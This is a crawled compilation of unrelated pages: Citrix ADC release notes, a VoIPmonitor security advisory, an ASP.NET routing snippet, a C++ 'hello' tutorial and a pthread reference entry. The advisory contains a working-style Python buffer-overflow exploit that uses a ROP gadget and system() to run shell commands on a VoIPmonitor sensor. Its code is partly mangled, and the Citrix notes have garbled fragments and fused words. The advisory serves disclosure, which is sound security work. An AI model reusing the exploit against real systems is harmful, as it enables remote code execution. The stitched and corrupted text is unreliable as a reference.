Type of files within a SIM that are accessible via QSimFiles. | https://doc.qt.io/archives/qtopia4.3/qtelephony.html | CC-MAIN-2021-17 | en | refinedweb |
Release Notes for Citrix ADC 13.0-71.40 Release
Notes
- This release notes document does not include security related fixes. For a list of security related fixes and advisories, see the Citrix security bulletin.
What's New
Authentication, authorization, and auditing
Azure Guv support for token authentication in Microsoft Intune integration
In Citrix Gateway and Microsoft Intune integration scenario, Citrix Gateway now supports Microsoft Azure Guv infrastructure for Microsoft Active Directory Libraries (ADAL) token authentication. Previously, only Microsoft Azure commercial infrastructure was supported.[ NSAUTH-8246 ]
Citrix Gateway
Support for dynamic secure DNS update on Windows plug-in
VPN plug-in for Windows now supports Secure DNS update. This feature is disabled by default. To enable it, create HKEY_LOCAL_MACHINE\SOFTWARE\Citrix\Secure Access Client\secureDNSUpdate value of type REG_DWORD and set it to 1.
[ CGOP-13788 ]
- When you set the value to 1, the VPN plug-in tries the unsecure DNS update first. If the unsecure DNS update fails, the VPN plug-in tries the secure DNS update.
- To try only the secure DNS update, you can set the value to 2.
Citrix Web App Firewall
Device fingerprinting bot detection technique for mobile (Android) applications using Bot Mobile SDK
The device fingerprinting bot detection mechanism is now enhanced to secure mobile (Android) applications from bot attacks. To detect bots in a mobile application, the device fingerprinting detection technique uses a bot mobile SDK. The SDK is integrated with the mobile application to intercept the mobile traffic, collect client and device details, and send the data to the appliance. On the appliance side, the device fingerprinting bot detection technique examines the data and determines whether the connection is from a bot or a human.[ NSWAF-5983 ]
Load Balancing
Support for file-based pattern sets
The Citrix ADC appliance now supports file-based pattern sets.
You can import a new pattern set file into the Citrix ADC appliance using the following command:
import patsetfile <src> <name> -overwrite -delimiter <char> -charset <ASCII | UTF_8>
You can update an existing pattern set file on the Citrix ADC appliance using the following command:
update patsetfile <patset filename>
You can add a pattern set file to the packet engine using the following command:
add patsetfile <patset filename>
You can bind patterns to the pattern set file using the following command:
add patset <name> -patsetfile <patset filename>[ NSLB-5823 ]
MQTT protocol support on Citrix ADC appliances
Citrix ADC appliances now natively support the Message Queuing Telemetry Transport (MQTT) protocol. MQTT is an OASIS standard messaging protocol for the Internet of Things (IoT). With this support, the Citrix ADC appliance can be used in IoT deployments to load balance MQTT traffic.
Previously, you could configure MQTT on the Citrix ADC appliance by using protocol extensions. Users had to write their own extension code and import the extension file to the Citrix ADC appliance, from either a web server (using HTTP) or local workstation.[ NSLB-5822 ]
Networking
Support added in Citrix ADC CPX for Cilium CNI in a Kubernetes environment
Citrix ADC CPX now supports Cilium CNI in a Kubernetes environment. Cilium is an open-source CNI which uses the extended version of the Berkeley Packet Filter (BPF) to improve the visibility, performance, and scalability of applications on Kubernetes.[ NSNET-17264 ]
Configure the Citrix ADC appliance to source Citrix ADC FreeBSD data traffic from a SNIP address
Some Citrix ADC data features run on the underlying FreeBSD OS instead of on the Citrix ADC OS. Because of this reason, these features send traffic sourced from the Citrix ADC IP (NSIP) address instead of sourced from a SNIP address. Sourcing the data traffic from the NSIP address is not desirable if your setup has configurations to separate all management and data traffic.
The following Citrix ADC data features run on the underlying FreeBSD OS and send traffic sourced from the Citrix ADC IP (NSIP) address:
- Load balancing scriptable monitors
- GSLB autosync
To resolve this issue, a global Layer-2 parameter "useNetprofileBSDtraffic" has been introduced. When this parameter is enabled, the Citrix ADC features send traffic sourced from one of the SNIP addresses in a netprofile associated with the feature.
Currently, the global Layer-2 parameter "useNetprofileBSDtraffic" is supported only for load balancing scriptable monitors.
For configuring the Citrix ADC appliance to source GSLB autosync traffic from a SNIP address, you can use extended ACL and RNAT rules as a workaround.[ NSNET-16274 ]
Dataset based extended ACLs
A large number of ACLs are required in an enterprise. Configuring and managing a large number of ACLs is very difficult and cumbersome when they require frequent changes.
A Citrix ADC appliance now supports datasets in extended ACLs. Dataset is an existing feature of a Citrix ADC appliance. A dataset is an array of indexed patterns of types: number (integer), IPv4 address, or IPv6 address.
Dataset support in extended ACLs is useful for creating multiple ACL rules, which require common ACL parameters. While creating an ACL rule, instead of specifying the common parameters, you can specify an dataset, which includes these common parameters.
Any changes made in the dataset are automatically reflected in the ACL rules that are using this dataset. ACLs with datasets are easier to configure and manage. They are also smaller and easier to read than the conventional ACLs.
Currently, the Citrix ADC appliance supports only the IPv4 address type dataset for extended ACLs.[ NSNET-8252 ]
Platform
VMware ESX 7.0 support on Citrix ADC VPX instance
The Citrix ADC VPX instance now supports the VMware ESX hypervisor 7.0 build 1632494.[ NSPLAT-16902 ]
AWS Top Secret (C2S) region support extended for all the Citrix ADC editions
The AWS Top Secret (C2S) region now supports all the following Citrix ADC editions along with Bring Your Own License (BYOL):
- Standard Edition
- Advanced Edition
- Premium Edition
Previously, the AWS Top Secret region supported only the BYOL subscription.
The AWS Top Secret region is readily available through the Commercial Cloud Services (C2S) contract with AWS.[ NSPLAT-9195 ]
Policies
Support for dynamic expressions in the CONTAINS function for optimizing advanced policy usage.
Argument for the following methods are static:
[ NSPOLICY-3545 ]
- contains()
- after_str()
- before_str()
- substr(),
- strip_end_chars()
- strip_chars()
- strip_start_chars()
SSL
Support to offload crypto operations to Intel Coleto crypto chips in TLS 1.3 connections
In TLS 1.3 connections, support is now added to offload crypto operations to Intel Coleto crypto chips on specific Citrix ADC MPX platforms.
The following appliances that ship with Intel Coleto chips are supported:
MPX 5900
MPX/SDX 8900
MPX/SDX 15000
MPX/SDX 15000-50G
MPX/SDX 26000
MPX/SDX 26000-50S
MPX/SDX 26000-100G
Software-only support for the TLSv1.3 protocol is available on all other Citrix ADC MPX and SDX appliances except Citrix ADC FIPS appliances.[ NSSSL-7453 ]
All subject alternate name (SAN) values are now displayed in a certificate
A Citrix ADC appliance now displays all the SAN values when the details of a certificates are displayed.[ NSSSL-5978 ]
Policy support for TLSv1.3 protocol
When TLSv1.3 protocol is negotiated for a connection, policy rules that inspect TLS data received from the client now trigger the configured action.
For example, if the following policy rule returns true, the traffic is forwarded to the virtual server defined in the action.
add ssl action action1 -forward vserver2
add ssl policy pol1 -rule client.ssl.client_hello.sni.contains(xyz) -action action1[ NSSSL-869 ]
System
Display CPU usage (in parts per thousand) for a load balancing virtual server
A new counter, "CPU-PM" now displays the statistical data for the CPU usagein per-Mille (parts per thousand). For example,500 must be read as 500/1000 which is equal to 50 percent.
In GUI, navigate to Traffic Management > Virtual Servers > Load Balancing > Statistics[ NSBASE-11304 ]
Support for request retry on timeout
Request retry is now available for one more scenario where,ifa back-end server takes more time to respond to requests, the appliance performs re-load balancing upon timeout and forwards the request to the next available server. Previously, the appliance kept waiting for server response which led to an increased RTT.
To perform timeout, a new parameterretryOnTimeout in <milli-secs> is configurable in appqoe action. Minimum value: 30
Maximum value: 2000.
To configure request retry on timeout by using the CLI:
addappqoe action <name> -retryOnTimeout <msecs>
Example
add appqoe action appact1 -retryOnTimeout 35[ NSBASE-10914 ]
Process local and retain connections support for MPTCP cluster deployments
MPTCP connections now support "Process Local" and "Retain Connections" features in the cloud and on-premises Citrix ADC cluster deployments.[ NSBASE-10734 ]
Responder response-related information in AppFlow records
The AppFlow records generated by the Citrix ADC appliance now include the responder response-related information.[ NSBASE-10634 ]
Support for larger HTTP header size
Citrix ADC appliance can now handle a large header size HTTP requests to accommodate the L7 application request. The header size of an HTTP request is increased to 128 KB.[ NSBASE-7957 ]
Fixed Issues
Authentication, authorization, and auditing
In some cases, after the user password is changed, the following error message appears, Cannot complete your request.
The error occurs because the modified password is corrupted after encryption.[ NSHELP-25437 ] ]
In some cases, when Citrix ADC is used as an IdP to Citrix Cloud, Authentication, authorization, and auditingD crashes while performing nested group extraction activity in AD because of memory buffer overflow.[ NSHELP-24884 ]
LDAP authentication fails in a Citrix ADC appliance when a user's group length exceeds the defined limit.[ NSHELP-24373 ]
When trying to log on to the Citrix Gateway appliance, a user does not see a response if the log on attempt fails.[ NSHELP-23155 ]
The configuration of the non-addressable authentication virtual server is not restored after a reboot if the following conditions are met:
[ NSAUTH-9263 ]
- The Citrix ADC appliance has a Standard edition license
- The appliance is configured for nFactor authentication using Citrix Gateway
Caching
A Citrix ADC appliance might randomly crash if the following conditions are observed:
- Integrated caching feature is enabled.
- 100 GB or more memory is allocated for integrated caching.
Allocate less than 100 GB of memory.[ NSHELP-20854 ]
CallHome
On the Citrix AC MPX 22000 platform, the show techsupport command incorrectly shows that the hard drive is not mounted.[ NSHELP-24223 ]
Citrix ADC SDX Appliance
The Citrix ADC SDX appliance upgrade fails if the Citrix Hypervisor consumes more than 90% of the disk space.[ NSHELP-24873 ] ]
Citrix Gateway
In rare cases, the Citrix Gateway appliance might crash during session synchronization with the secondary appliance or during Intranet IP assignment.[ NSHELP-25221 ]
The UrlName parameter is appended to the session and other policy bindings when classic VPN URL is also bound leading to configuration addition on save and reboot.[ NSHELP-25072 ]
The Citrix Gateway IIP registration fails if Split DNS is set to "Both" or "Local".[ NSHELP-24928 ]
If ICA smart policy is enabled and there is some residual AppFlow configuration, you might observe a high latency connection.[ NSHELP-24908 ]
The Citrix ADC appliance might crash when UDP audio is enabled and the internal malloc system call returns an error.[ NSHELP-24890 ]
In rare cases, a Citrix Gateway appliance crashes when the syslog transport type is modified due to a memory corruption.[ NSHELP-24794 ]
The Citrix Gateway appliance does not extract the common-name from UTF8String encoded device certificates.[ NSHELP-24741 ]
The Citrix Gateway appliance crashes on removal of an intranet app whose hostName value exceeds 160 characters.[ NSHELP-24524 ]
If location detection is enabled, the Always On VPN's machine level tunnel takes a long time to get established after the client machine is restarted.[ NSHELP-24508 ]
The Citrix ADC appliance might crash when configured for clientless VPN.[ NSHELP-24430 ]
The Citrix Gateway appliance might reboot if the RDP server profile bound to the VPN virtual server does not have the RDP IP address configured and the same port is used by the RDP server profile and the VPN virtual server.[ NSHELP-24199 ] Citrix Gateway appliance might go down in an EDT proxy deployment if the "kill icaconnection" command is run while an EDT connection establishment is in progress.[ NSHELP-23882 ]
The Windows plug-in displays the Gateway not reachable message if the client machine has multiple instances of the Hyper-V and WiFi direct access virtual adapters.[ NSHELP-23794 ]
A Citrix Gateway appliance might crash when trying to parse an incoming packet.[ NSHELP-23747 ]
The Citrix Gateway appliance crashes when using UDP audio while accessing the Virtual Desktop.
Use EDT audio instead of UDP audio.[ NSHELP-23514 ]
The UDP/ICMP/DNS based authorization policy denials for VPN do not show up in the ns.log file.[ NSHELP-23410 ]
The Citrix ADC appliance might crash during failover if UDP audio is enabled.[ NSHELP-22850 ]
Citrix Web App Firewall
Communication errors are observed in aslearn when you reset the Citrix Web App Firewall learning data in a cluster configuration.[ NSWAF-6768 ]
In a cluster configuration, theWeb Services Interoperability (WSI) Check value with space is considered as an invalid input although it is valid in a Citrix ADC core appliance.[ NSWAF-6745 ]
The default credit card name configuration details for basic or advanced Web App Firewall profiles are missing in a cluster deployment.[ NSWAF-6675 ]
The default XML DOS binding for default Web App Firewall advanced profile is missing in a cluster deployment.[ NSWAF-6672 ]
In a cluster configuration, unable to bind the "safeobject" rule with a "safeobject" expression length of more than 255 characters.[ NSWAF-6670 ]
The default value for "FileUploadTypesAction" configuration for basic or advanced Web App Firewall profile is missing in a cluster deployment.[ NSWAF-6669 ]
Incorrect default "CMDInjectionAction" configuration is observed for Web App Firewall basic or advanced profile in a cluster deployment.[ NSWAF-6668 ]
A Citrix ADC cluster setup might crash if there are DHT transport errors between the cluster nodes, and the field consistency protection feature is enabled.[ NSWAF-6560 ]
The Citrix Web App Firewall cookie consistency check removes the SameSite cookie attribute in the response sent by the back-end server.[ NSHELP-24313 ]
Load Balancing
When a GSLB deployment uses the round trip time (RTT) method for load balance, the Citrix ADC appliance might fail if you delete or unbind a GSLB service during the traffic flow.[ NSHELP-24425 ]
The Citrix ADC appliance might crash if the association between Distributed Hash Table (DHT) entry and persistence session is deleted while freeing up the persistence session.[ NSHELP-24213 ]
Feature: Load Balancing
If a service group member is assigned a wildcard port (port *), the monitor details for that service group member can be viewed from the Monitor Details page.[ NSHELP-9409 ]
Networking
In a Citrix ADC BLX or Citrix ADC CPX appliance, installing OSPF or BGP routes to the appliance's routing table might fail.[ NSNET-18707 ]
RNAT with "useproxyport" disabled might not work as expected for source ports that are numbered lesser than 1024.[ NSHELP-25162 ]
In a high availability setup with INC mode, any RNAT rule that has a VIP address set as the NAT IP address is removed during HA synchronization.[ NSHELP-24893 ]
Loading the Citrix ADC SNMP MIB to an SNMP manager might fail because of the presence of a duplicate object name "urlfiltDbUpdateStatus" in the SNMP MIB. The same object name "urlfiltDbUpdateStatus" is used for an SNMP trap and an SNMP trap variable binding.
With the fix, the "urlfiltDbUpdateStatus" SNMP trap variable binding is changed to "urlFilterDbUpdateStatus".[ NSHELP-24778 ]
A Citrix ADC appliance might crash because of an internal memory synchronization issue in the LSN module.[ NSHELP-24623 ]
IPv6 policy based routes (PBR6) on a Citrix AC appliance might not work as expected.[ NSHELP-23161 ]
In a high availability setup, one of the Citrix ADC appliances might crash if you perform In Service Software Upgrade (ISSU) from Citrix ADC software version 13.0 47.24 or previous, to a later version.[ NSHELP-21701 ]
Platform
The Citrix ADC MPX 8000-1G platform supports pooled licensing.[ NSPLAT-17354 ] ]
While upgrading a Citrix ADC SDX appliance, if an SSD fails during one of the many reboots, the corresponding RAID pair volume becomes inactive after the appliance reboots. You can observe the following:
The volume appears as "not created" in the GUI.
The failed SSD slot is reported as "not present."
The corresponding VPX-SR also shows up as degraded.
As a result, ADC instances residing on the VPX-SR might not boot or remain in a halted state.[ NSHELP-24751 ]
Feature: Platform
When multiple LA channels are configured on an SDX appliance without any management interfaces (0/1, 0/2) and if the first LA channel is disabled through the VPX CLI, the VPX appliance might be unreachable.
[ NSHELP-21889 ]
Feature: Citrix ADC SDX appliance
On the ADC SDX 14000 and 15000 appliances, traffic loss of up to 9 seconds is observed if the following conditions are met:
[ NSHELP-21875 ]
- 10G ports are connected using the LA channel to two Cisco switches that are configured in VPC setup as active or passive
- The link to active or primary Cisco switch bounces.
Policies
A Citrix ADC appliance might crash if global scope variables are used in invalid HTTP requests.[ NSHELP-25369 ] MPX/SDX 11542, MPX/SDX 14000, MPX 22000/24000/25000, or MPX/SDX 14000 FIPS appliance might crash if the following conditions are met:
[ NSHELP-24405 ]
- ECDHE/ECDSA hybrid model is enabled.
- DTLS traffic is received when the CPU utilization is already high.
A Citrix ADC appliance might not propose ECDHE ciphers in the client hello message if the following conditions are met:
[ NSHELP-24355 ]
- HA synchronization is in progress.
- Monitor probes are sent before the synchronization is complete.
The Citrix ADC appliance crashes if NULL or RC2 ciphers are used by the SSL backend service on the following platforms:
[ NSHELP-24308 ]
- MPX 5900
- MPX 8900
- MPX 15000
- MPX 15000-50G
- MPX 26000
- MPX 26000-50S
- MPX 26000-100G
A Citrix ADC appliance might crash when configuring a DTLS virtual server if the appliance is low on disk space.[ NSHELP-24201 ] ]
System ]
A Citrix ADC appliance might crash because of memory corruption when the HTTP/2 feature is enabled.[ NSHELP-25005 ]
In a cluster setup, the validation of default values in surge protection is handled differently on the database and packet engine.[ NSHELP-24455 ]
The analytics records are not sent to the Citrix ADM if the following conditions are observed:
-IPFIX collector is configured in the admin partition of the Citrix ADC appliance.
-Collector is in a subnet other than SNIP address.[ NSHELP-24283 ]
High CPU usage is observed in the Citrix ADC web logging (NSWL) client running on a Linux platform if thepolling interval is not set properly.[ NSHELP-24266 ].
Add a database reference count to the TCP profile.[ crash if the following conditions are observed:
[ NSHELP-21202 ]
- HTTP/2 enabled in the HTTP profile bound to load balancing virtual server of type HTTP/SSL or service.
- Connection multiplexing option disabled in the HTTP Profile bound to load balancing virtual server or service.
Feature: AppFlow
A Citrix ADC appliance with connection chaining and SSL enabled might send more MTU data.[ NSHELP-9411 ]
Enabling metrics collector in the default partition might fail if it is already enabled in the admin partition setup.
Do not enable metrics collector in the admin partition setup.[ NSBASE-12623 ]
User Interface
The diff ns config command displays an ERROR: Failed to get UID for command: apply ns pbr6 error message. It happens when the apply ns pbr6 command is saved in ns.conf or running-config files.[ NSHELP-25373 ]
In a cluster setup, unwanted extra binding configuration gets saved in the ns.conf file.[ NSHELP-24636 ]
The following error conditions are observed in the Citrix Gateway GUI:
[ NSHELP-24494 ]
- When a policy is bound to primary authentication in the VPN virtual server, the GUI incorrectly shows that the policy is bound to the secondary authentication and the group authentication.
- When the VPN virtual server is bound to a server certificate, the server GUI incorrectly shows that the VPN virtual server is bound to CA cert as well.
On a Citrix ADC SDX platform, the following error message appears while loading the GUI:
Operation not supported by device&%2391;Pooled licensing not supported on this platform&%2393;[ NSHELP-24474 ]
On the Citrix ADC GUI, you are unable to view the "Custom Reports" created for a specific partition.[ NSHELP-24370 ]
The following temporary files present in the /var/tmp folder of a Citrix ADC appliance is causing memory full state.
[ NSHELP-24092 ]
- sh.runn.audit.<pid> file created by nsconfigaudit tool.
- tmp_ns.conf.<pid> file created by show run command for partition.
For a "routerdynamicrouting" NITRO API request, the Citrix ADC appliance might return JSON data with formatting errors if the response size is large.[ NSHELP-19913 ]
Feature: System
A Citrix ADC appliance becomes unstable if you use the -outfilename parameter in diffnsconfig command. As a result, the diffnsconfig output is large to completely fill the root disk.[ NSHELP-19345 ]
Known Issues
Authentication, authorization, and auditing
In some cases, a Citrix ADC appliance crashes when user tries to configure a customized EULA login schema.
Use default EULA login schema.[ NSHELP-25570 ]
If a Citrix ADC appliance is configured for nFactor authentication and is upgraded to version 13.0, the endpoint (example iPad) used to access the Citrix ADC appliance is presented with 401-based authentication instead of Form-based authentication.[ NSHELP-25309 ]
Feature: Authentication, authorization, and auditing-TM
A Citrix ADC appliance does not authenticate duplicate password login attempts and prevents account lockouts.[ NSHELP-563 ]
A Citrix ADC appliance responds with a 400 error code when the header size of a Citrix Gateway user interface related request exceeds 1024 characters.[ NSAUTH-9475 ]
Feature: Authentication, authorization, and auditing
The DualAuthPushOrOTP.xml LoginSchema is not appearing properly in the login schema editor screen of Citrix ADC GUI.[ NSAUTH-6106 ]
Feature: Authentication, authorization, and auditing
ADFS proxy profile can be configured in a cluster deployment. The status for a proxy profile is incorrectly displayed as blank upon issuing the following command.
"show adfsproxyprofile <profile name>"
Connect to the primary active Citrix ADC in the cluster and run the "show adfsproxyprofile <profile name>" command. It would display the proxy profile status.[ NSAUTH-5916 ]
Feature: Authentication, authorization, and auditing
If an FQDN is used for configuring wiHome or StoreFront over an SSL connection, ECDHE ciphers are not negotiated during the boot-up process.[ NSHELP-25144 ]
EPA plug-in for Windows does not use local machine's configured proxy and connects directly to the gateway server.[ NSHELP-24848 ] ]
Feature: Citrix Gateway
A Citrix Gateway appliance does not fallback to the LDAP policy if the following conditions are met:
[ NSHELP-1853 ]
- Certificate authentication and LDAP are configured as the first factor and LDAP checks data from login Schema.
- The certificate authentication fails.
Memory leak is observed if HDX Insight with advanced encryption is enabled.
Use HDX Insight with basic encryption instead of advanced encryption.[ CGOP-15689 ]
Transfer Logon does not work if the following two conditions are met:
[ CGOP-14092 ]
- nFactor authentication is configured.
- Citrix ADC theme is set to Default.
Feature: Citrix Gateway
The Gateway Insight report incorrectly displays the value "Local" instead of "SAML" in the Authentication Type field for SAML error failures.[ CGOP-13584 ]
Feature: Citrix Gateway
The ICA connection results in a skip parse during ICA parsing if users are using MAC receiver along with version 6.5 of Citrix Virtual App and Desktops (formerly Citrix XenApp and XenDesktop).
Upgrade the receiver to the latest version of Citrix Workspace app.[ CGOP-13532 ]
Feature: Citrix Gateway ]
Feature: Citrix Gateway:
[ NSWAF-22 ]
- Request URL
- Source IP address
- Sourcesynchronization of configuration from the master site to subordinate sites fails.[ NSHELP-23391 ]
A Citrix ADC appliance might crash when DNS logging is enabled and a malformed DNS query is received.[ NSHELP-21959 ]
Networking
WhenyoupushconfigurationstotheclusterinstancesusingaStyleBook,thecommandsfail withthe"Command propagation failed" error message.
Onsuccessive failures,theclusterretainsthepartialconfiguration.
1.Identifythefailedcommandsfromthelog.
2.Manuallyapplytherecoverycommandstothefailedcommands.[ NSHELP-24910 ]
In a high availability setup, the SNMP module might crash repeatedly because of improper handling of data by the packet engines and internal networking modules.
This repeated crash of the SNMP module triggers HA failover.[ NSHELP-24434 ] ]
Feature: Citrix ADC SDX platform
Support for new Citrix ADC SDX hardware platforms
This release now supports the following new platforms:
[ NSPLAT-12815 ]
- Citrix ADC SDX 15000. For more information, see
- Citrix ADC SDX 26000. For more information, see
- Citrix ADC SDX 26000-50S. For more information, see
&%2391;From Build 51.10&%2393;
On the Citrix ADC SDX 14000 and SDX 25000 platforms, a core dump is not generated through the lights out management Non-Maskable Interrupt (NMI) button.[ NSHELP-25091 ]
Policies
Feature: System
Connections might hang if the size of processing data is more than the configured default TCP buffer size.
Set the TCP buffer size to maximum size of data that needs to be processed.[ NSPOLICY-1267 ]
SSL
Feature: SSL
Update command is not available for the following add commands:
[ NSSSL-6484 ]
- add azure application
- add azure keyvault
- add ssl certkey with hsmkey option
Feature: SSL
You cannot add an Azure Key Vault object if an authentication Azure Key Vault object is already added.[ NSSSL-6478 ]
Feature: SSL
You can create multiple Azure Application entities with the same client ID and client secret. The Citrix ADC appliance does not return an error.[ NSSSL-6213 ]
Feature: SSL
The following incorrect error message appears when you remove an HSM key without specifying KEYVAULT as the HSM type.
ERROR: crl refresh disabled[ NSSSL-6106 ]
Feature: SSL
Session Key Auto Refresh incorrectly appears as disabled on a cluster IP address. (This option cannot be disabled.)[ NSSSL-4427 ]
Feature: SSL
An incorrect warning message, "Warning: No usable ciphers configured on the SSL vserver/service," appears if you try to change the SSL protocol or cipher in the SSL profile.[ NSSSL-4001 ]
Feature: SSL ]
Feature: SSL
In a cluster setup, the running configuration on the cluster IP (CLIP) address shows the DEFAULT_BACKEND cipher group bound to entities, whereas it is missing on nodes. This is a display issue.[ NSHELP-13466 ]
System
A Citrix ADC appliance is unable to handle server-side connections and cannot log correct AppFlow records if the following conditions are observed:
[ NSHELP-24824 ]
- The domain name which matches a private urlset is not obfuscated correctly from the AppFlow records.
- The Responder Action, Policy Matched, and Matched ID fields are incorrectly populated in the AppFlow records.
When Citrix ADC CPX is deployed as a sidecar and if the environment variable MGMT_HTTP_PORT is not set, NITRO API calls are not working
When you deploy Citrix ADC CPX in as a sidecar, you must setthe MGMT_HTTP_PORT environment variable. You can assign any unassigned port number including 9080.[ NSBASE-12800 ]
User Interface
Feature: Cloudbridge connector
Create/Monitor CloudBridge Connector wizard might become unresponsive or fails to configure a cloudbridge connector. &%2391;-config <full path of the configuration file (ns.conf)>&%2393;" ] | https://docs.citrix.com/en-us/citrix-adc/downloads/release-notes-13-0-71-40.html | CC-MAIN-2021-17 | en | refinedweb |
Static binaries provided for VoIPmonitor version2 7.5 are built without any memory corruption protection in place.
09ac3f424c1b38dd778fb7800b626973
# VoIPmonitor static builds are compiled without any standard memory corruption protection
- Fixed versions: N/A
- Enable Security Advisory:
- VoIPmonitor Security Advisory: none
- Tested vulnerable versions: 27.5
- Timeline:
- Report date: 2021-02-10 & 2021-02-13
- Enable Security advisory: 2021-03-15
## Description
The binaries available for download at <> are built without any memory corruption protection in place. The following is output from the tool `hardening-check`:
```
hardening-check!
```
When stack protection together with Fortify Source and other protection mechanisms are in place, exploitation of memory corruption vulnerabilities normally results in a program crash instead of leading to remote code execution. Most modern compilation systems create executable binaries with these features built-in by default. When these features are not used, attackers may easily exploit memory corruption vulnerabilities, such as buffer overflows, to run arbitrary code. In this advisory we will demonstrate how a buffer overflow reported in a separate advisory, could be abused to run arbitrary code because of the lack of standard memory corruption protection in the static build releases of VoIPmonitor.
The vendor has explained that:
> we are not going to enable the protection in the static builds as the speed is critical on many installations
> Our static build also uses tcmalloc (recommended version) which is required for high packet/second processing as the libc allocator is not fast enough especially on NUMA systems. For high packet/second traffic FORTIFY_SOURCE can introduce a lot of additional CPU cycles. If using custom builds with FORTIFY_SOURCE - they should compare if the sniffer did not introduced higher CPU usage.
While we understand the vendor's position, we are issuing an advisory to ensure that end users can make informed risk-based decisions.
## Impact
The lack of standard memory corruption protection mechanisms means that such vulnerabilities may lead to remote code execution.
## How to reproduce the issue
1. Execute the static build of VoIPmonitor (such as)
2. Start the live sniffer from the VOIPMonitor GUI or via the manager on port 5029
3. Execute the following Python program so that VOIPMonitor is able to capture the packet
4. Observe the payload being executed by the `voipmonitor` process, i.e. the following:
- current user is printed due to execution of the `whoami` command
- `h4x0r was here` is also printed
- a file has been created in `/tmp/woot`
```python
import struct
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
payload_size=32607
# Pad with As
payload = b'A' * 703
payload_size-=len(payload)
# Write system payload
cmd=b'whoami;echo "h4x0r was here";touch /tmp/woot\x00'
payload+=cmd
payload_size-=len(cmd)
# Pad some more so that we can overwrite the save_packet_sql's function return address
payload += b'A' * payload_size
# Call a ROP gadged that increments the value of the RDI register,
# which will now point to the value set by cmd
payload += struct.pack('<Q', 0x0000000000b222f1)
# Return to system() to execute the value in RDI
payload += struct.pack('<Q', 0xb22fd0)
# Return to exit() to exit gracefully\r\n'
msg+=b'Max-Forwards: 70\r\n'
msg+=b'From: <sip:[email protected]>;tag=mnq1nKGNZHNUkNOG\r\n'
msg+=b'To: <sip:[email protected]>\r\n'
msg+=b'Call-ID: 93X9dNZO2qdcfpdu\r\n'
msg+=b'CSeq: 1 REGISTER\r\n'
msg+=b'Contact: <sip:[email protected]:35393;transport=udp>\r\n'
msg+=b'Expires: 60\r\n'
msg+=b'Content-Length: 0\r\n'
msg+=b'\r\n'
s.sendto(msg, ('167.71.58.84', 5060))
```
## Solution and recommendations
Users who would like to have standard memory corruption protection for VoIPmonitor should compile the binaries themselves and apply their own upgrades rather than using the upgrade feature from the VoIPmonitor GUI / sensors page.
We recommended the following to the vendor:
> Our recommendation is that standard memory corruption protection be switched on by default in the official binary build of VoIPmonitor. If there are specific requirements for specific systems that require such features to be switched off, then additional binaries should be offered, with adequate documentation of the risks involved.
> Do note that memory corruption vulnerabilities should also be addressed and fixed even if security features, such as Fortify, are used.
## Acknowledgements
Enable Security would like to thank Martin Vit and the developers at VoIPmonitor for the very quick responses and explanations with regards to <>.
--: | https://exploit.kitploit.com/2021/03/voipmonitor-275-missing-memory.html | CC-MAIN-2021-17 | en | refinedweb |
In cases where you need a common portion of the route for all routes within a controller,
RoutePrefix attribute is used.
In the below example, api/students part of the code is common and so we can define
RoutePrefix and avoid using it repeatedly.
[RoutePrefix("api/students")] public class StudentController : ApiController { [Route("")] public IEnumerable<Student> Get() { //action code goes here } [Route("{id:int}")] public Student Get(int id) { //action code goes here } [Route("")] public HttpResponseMessage Post(Student student) { //action code goes here } } | https://riptutorial.com/asp-net-web-api/example/32433/route-prefix-attribute | CC-MAIN-2021-17 | en | refinedweb |
Let's begin with a simple C++ program that displays a message.
The following code uses the C++ cout (pronounced "see-out") to produce character output.
The source code comments lines begin with
//, and the compiler
ignores them.
C++ is case sensitive. It discriminates between uppercase characters and lowercase characters.
The cpp filename extension is a common way to indicate a C++ program.
#include <iostream> // a PREPROCESSOR directive int main() // function header { // start of function body using namespace std; // make definitions visible cout << "this is a test."; // message cout << endl; // start a new line cout << "hi!" << endl; // more output return 0; // terminate main() }
The code above generates the following result.
To make the window stay open until you strike a key by adding the following line of code before the return statement:
cin.get();
If you're used to programming in C, you would not know cout but you do know the printf() function.
C++ can use printf(), scanf(), and all the other standard C input and output functions, if that you include the usual C stdio.h file.
You construct C++ programs from building blocks called functions.
Typically, you organize a program into major tasks and then design separate functions to handle those tasks.
The example shown above is simple enough to consist of a single function named main().
The main() function is a good place to start because some of the features that precede main(), such as the preprocessor directive.
The sample program has the following fundamental structure:
int main() { statements return 0; }
The final statement in main(), called a return statement, terminates the function.
The code above has the following elements:++, leaving the parentheses empty is the same as using void in the parentheses.
Some programmers use this header and omit the return statement:
void main() | http://www.java2s.com/Tutorials/C/Cpp_Tutorial/index.htm | CC-MAIN-2021-17 | en | refinedweb |
pthread_rwlock_tryrdlock()
Attempt to acquire a shared lock on a read-write lock
Synopsis:
#include <pthread.h> int pthread_rwlock_tryrd locked.
- EDEADLK
- The calling thread already has an exclusive lock for rwl.
- EFAULT
- A fault occurred when the kernel tried to access rwl.
- EINVAL
- The read-write lock rwl is invalid. | https://developer.blackberry.com/playbook/native/reference/com.qnx.doc.neutrino.lib_ref/topic/p/pthread_rwlock_tryrdlock.html | CC-MAIN-2021-17 | en | refinedweb |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.